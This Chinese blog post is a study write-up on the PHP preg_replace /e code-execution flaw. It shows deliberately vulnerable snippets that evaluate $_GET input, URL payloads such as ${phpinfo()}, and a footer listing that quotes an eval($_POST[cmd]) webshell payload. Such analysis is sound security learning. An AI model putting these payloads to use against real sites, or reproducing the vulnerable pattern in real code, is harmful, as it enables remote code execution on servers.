php preg_replace /e 模式 漏洞分析

已于 2022-04-16 14:11:30 修改
阅读量3.5k 收藏 12
点赞数 6
分类专栏: 命令执行 文章标签: web安全
于 2022-04-15 19:09:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/reme_mber/article/details/124185032
版权

文章目录

前言

文章同步于我的个人博客https://quan9i.top,欢迎大家访问
在做一道可以进行rce的相关题时,发现很多之前不知道的知识,并且感到这个漏洞很有意思,进行了简单分析,总结如下,希望能对师傅们有帮助

案例

0X01

首先我们来看这代码进行分析

<?php
function test($str){}
echo preg_replace("/s*(.*)s*/ies", "\\1", $_GET["h"]);
show_source(__FILE__);
?>

想读懂这段代码,首先你需要了解一下preg_replace函数

preg_replace — 执行一个正则表达式的搜索和替换
mixed preg_replace( mixed $pattern, mixed $replacement, mixed $subject)
搜索subject中匹配pattern的部分,以replacement进行替换。

以及一部分修正符的含义

1/g 表示该表达式将用来在输入字符串中查找所有可能的匹配,返回的结果可以是多个。如果不加/g最多只会匹配一个
2/i 表示匹配的时候不区分大小写,这个跟其它语言的正则用法相同
3/m 表示多行匹配。什么是多行匹配呢?就是匹配换行符两端的潜在匹配。影响正则中的^$符号
4/s 与/m相对,单行模式匹配。
5/e 可执行模式,此为PHP专有参数,例如preg_replace函数。
6/x 忽略空白模式。

还有\\1这个东西

反向引用

对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区 中
,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始,
最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 '\n' 访问,其中 n 为一个标识特定缓冲区的
一位或两位十进制数。

那么我们可以看出其大致含义就是匹配出的任意内容,都用()包含起来,作为子字符串,存在缓冲区,\1是访问括号内的内容,此时我们上面那个代码,我们就可以构造如下payload进行rce

?h=${phpinfo()}

在这里插入图片描述
对于payload中${}的解释,它这里其实是一个可变变量
https://www.php.net/manual/zh/language.variables.variable.php
我们输入了${phpinfo()},那么它呢因为被括号包裹了,就会存进缓冲区,此时他是符合那个过滤函数的,所以要更替为第二个语句,而这里用到了/e,就相当于将第二个语句给执行了,就相当于eval(xx),第二个语句也就是//1,而//1的含义是${phpinfo()},他这个时候总的语句呢就是eval(${phpinfo()}),这玩意就相当于变量里面套变量,所以我们需要先执行里面的,也就是${phpinfo()} 中的 phpinfo() 会被当做变量先执行,执行后,即变成 ${1} (phpinfo()成功执行返回true),此时我们呢再执行这个eval${1},这玩意能正常执行出来,由于我们没有给1赋值,他会给个警告,但是没问题,不影响我们的语句,所以这个时候我们的rce就实现了
对于上述过程,你可以直接用如下代码测试

<?php
eval(${phpinfo()});
?>

执行结果
在这里插入图片描述

0X02

代码如下

<?php
$data=$_GET['data'];
preg_replace('/<data>(.*)<\/data>/e','$ret="\\1";',$data);
show_source(__FILE__);
?>

再看这个,这个的话,我们先按之前那样,输入payload为如下

?data=<data>${phpinfo()}</data>

执行结果为
在这里插入图片描述

分析原因,此时括号内的内容是${phpinfo()},传到了缓冲区,执行后面语句时会调用,那么后面语句此时就相当于$ret=${phpinfo()},肯定会先执行phpinfo(),然后呢返回了1,此时语句是$ret=1,加上我们的/e是执行语句的,所以这里执行的就等同于eval($ret=1);我们本地测试一下输出结果
在这里插入图片描述
所以,这就是执行报错的原因所在,有没有解决办法呢,当然有,再加个{},此时执行结果如下
在这里插入图片描述

这是为啥呢,我们不妨再来分析一下,此时存入缓冲区的是{${phpinfo()}},此时由于\\1是反向引用,再加上/e,实际的执行语句就是eval($ret={${phpinfo()}})执行过里面之后,得到的就是eval($ret={1}),而里面会当做变量来执行,也就是eval($ret=${1}),此时就执行出来了。

0X03

<?
<?
function test($str){
}
preg_replace("/s*(.*)s*/ies", "test(\\1)", $_GET["h"]);
show_source(__FILE__);
/** 
*eval("\${phpinfo()}");
*eval("test(\"{\${phpinfo()}}\");");
*${phpinfo()}
*/
?>

这个的话payload如下

?h=${phpinfo()}

此时执行的就是eval(test(${phpinfo()}),,而后为eval(test(1)),里面那个是空的,所以执行结果为空,没有错误,可以正常执行

总结

这个漏洞可被利用性很大,但是在php5.5版本上/e就被弃用,因此这里只当学习一下思路和知识即可,本人只是小白,分析过程极有可能出现错误,还请各位师傅多多指正。
参考文章
https://xz.aliyun.com/t/2557#toc-4
https://www.cnblogs.com/sipc-love/p/14289984.html

quan9i
关注
  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
慎用preg_replace危险的/e修饰符(一句话后门常用)
12-18
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。 举例: 复制代码 代码如下: <?php preg_replace (“/(</?)(w+)([
关于preg_replace \e的代码执行
m0_64815693的博客
04-23 1584
关于preg_replace \e的代码执行
preg_replace函数漏洞利用
最新发布
BoJing6的博客
03-28 462
26就是&,%20就是空格,为什么用&&是因为&&是先执行前面语句为true后再执行后面的,就是先进入目录再ls,而&则被认为是两个独立的部分。构造payload=?\S*=${@eval($_POST[cmd])}是一个正则表达式模式,用于匹配零个或多个非空白字符。再看ics-05这题首先用php伪协议读取源码以后。将匹配任何非空白字符的序列。利用preg_replace漏洞读取目录结构。利用php伪协议来读取文件内容。首先看ctf不过如此那个题。
PHP正则替换函数preg_replace和preg_replace_callback使用总结
10-25
主要介绍了PHP正则替换函数preg_replace和preg_replace_callback使用总结,本文是在写一个模板引擎遇到一个特殊需求时总结而来,需要的朋友可以参考下
详解PHP正则表达式替换实现(PHP preg_replacePHP preg_replace)
01-19
PHP正则表达式替换实现是如何的呢?首先向你介绍下PHP preg_replacePHP preg_replace的使用是我们实现的方法,那么对于PHP正则表达式替换实现过程我们从实例入手。 PHP正则表达式替换的相关概念: preg_replace:执行正则表达式的搜索和替换 mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) preg_replace:允许你替换字符串中匹配到你定义的正则表达式。 一个简单的注释移除功能: preg_replace(‘[(/*)+.
PHP 5.5.9的 preg_replace()函数漏洞
qq_53099802的博客
05-24 835
PHP的preg_replace漏洞
preg_replace /e模式下代码漏洞
sGanYu
10-17 1132
<?php error_reporting(0); $text = $_GET["text"];//以get方式提交text $file = $_GET["file"];//以get方式提交file if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){//file_get_content需要读到一个$text传来的内容为I have a dream的文件 echo "<br>...
php preg replace e,关于 preg_replace 危险的“/e”修饰符
weixin_33980343的博客
03-10 1261
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。而函数中的 /e 这个修饰符的意思就是让 正则替换之后将 replacement 参数当作 PHP 代码。该用法常在 PHP webshell 中出现。preg_replace ( mixed pattern, mixed replacem...
preg_replace() /e代码执行漏洞
weixin_43749601的博客
01-30 4540
preg_replace() 函数函数执行一个正则表达式的搜索和替换。 语法 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。 参数说明: $pattern: 要搜索的模式,可以是字符串或一个字符串数组。 $replacem
php命令执行漏洞例子(简单)
qq_63527808的博客
04-05 136
至于为什么要匹配到 {${phpinfo()}} 或者 ${phpinfo()} ,才能执行 phpinfo 函数, 因为${phpinfo()} 中的 phpinfo() 会被当做变量先执行,执行后,即变成 ${1} (phpinfo()成功执行返回true)。2、漏洞产生原因,pattern 中有一个 \e 修饰符,在替换完成之后,可以将 replacement 中的内容当作代码来执行,相当于 eval(replacement);(1)pattern:要匹配的正则表达式;
PHP代码注入】PHP代码注入漏洞
cc
03-06 5952
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
深入研究preg_replace \e模式下的代码执行
paidx0
08-21 2549
深入研究preg_replace与代码执行 下面将深入研究 preg_replace /e 模式下的代码执行问题, 其中包括 preg_replace 函数的执行过程分析、正则表达式分析漏洞触发分析,当中的坑非常非常多,相信看完你也能学到很多 案例分析 <?php function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")',
php preg_replace()漏洞记录
Sea_Sand息禅
03-19 2003
先介绍一下preg_replace()函数: 摘自W3school 定义和用法: array_walk() 函数对数组中的每个元素应用用户自定义函数。在函数中,数组的键名和键值是参数。 注释:您可以通过把用户自定义函数中的第一个参数指定为引用:&$value,来改变数组元素的值 语法 array_walk(array,myfunction,userdata...) 参数 描述 ar...
RCE代码执行 & 命令执行(五)
guanjian_ci的博客
02-20 271
第一部分:代码执行&命令执行基本原理 代码执行漏洞(RCE:远程命令或者代码执行) 原理:用户输入的数据,被当做后端代码进行执行 代码执行:用户输入的数据,被当做后端代码进行执行 命令执行:用户输入的数据,被当系统进行执行 在php中有许多的代码执行函数 例如 <php eval($_request[8]);?> //eval 把字符串作为PHP代码执行. 可以多行执行 <php assert($_request[8]);?> //asse...
“百度杯”CTF比赛 九月场--Code
u011250160的博客
12-16 361
题目: 读取index.php的文件得到一段代码 base64解密得到一段php代码 <?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ header('content-type:text/html;charset=utf-8'); if(! isset($_GET['jpg'])) header('Refresh:0;url=./index.php?jpg=hei.jpg'); $file = $_G
php代码审计之preg_replace函数
giaogiao123的博客
11-08 5165
preg_replace:(PHP 5.5) 功能 : 函数执行一个正则表达式的搜索和替换 定义 : mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 看个例子 <?php preg_replace('/(.*)/ei', 'strtolower("\\1")', ${phpinfo()}); ?> ...
php正则实例,php正则/e的用法示例
weixin_35652131的博客
03-09 712
正则表达式中的/e模式的作用是将替换串中的内容当作代码来执行,/e模式php语言才有的,除此之外还有/i(不区分大小写)等。下面通过2个示例来演示php中正则/e模式的用法:...
preg_replace在java中_深入研究PHP中的preg_replace和代码执行
weixin_35756892的博客
02-19 180
前言本文将深入研究 preg_replace /e 模式下的代码执行问题,其中包括 preg_replace 函数的执行过程分析、正则表达式分析漏洞触发分析,当中的坑非常多,相信看完本文,你一定会有所收获。下面是 七月火 和 l1nk3r 的分析结果。案例下面先看一个案例,思考如何利用此处的 preg_replace /e 模式,执行代码(可以先不看下文分析,自己思考出 payload 试试)。...
preg_replace漏洞
鱼开yk2的博客
10-09 413
函数原型: mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索subject中匹配pattern(正则)的部分,以 replacement 进行替换。 参数说明: $pattern:要搜索的模式,可以是字符...
php中的preg_replace函数
06-11
preg_replace是一个PHP中用于正则表达式替换的函数。它的作用是在一个字符串中搜索匹配正则表达式的内容,并将其替换为指定的内容。函数的基本语法如下: ``` preg_replace($pattern, $replacement, $subject); ``` 其中,$pattern是一个用于匹配字符串的正则表达式,$replacement是用于替换匹配内容的字符串,$subject是要被搜索和替换的字符串。使用preg_replace可以方便地对字符串进行替换操作,常用于字符串格式化、文本处理等方面。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值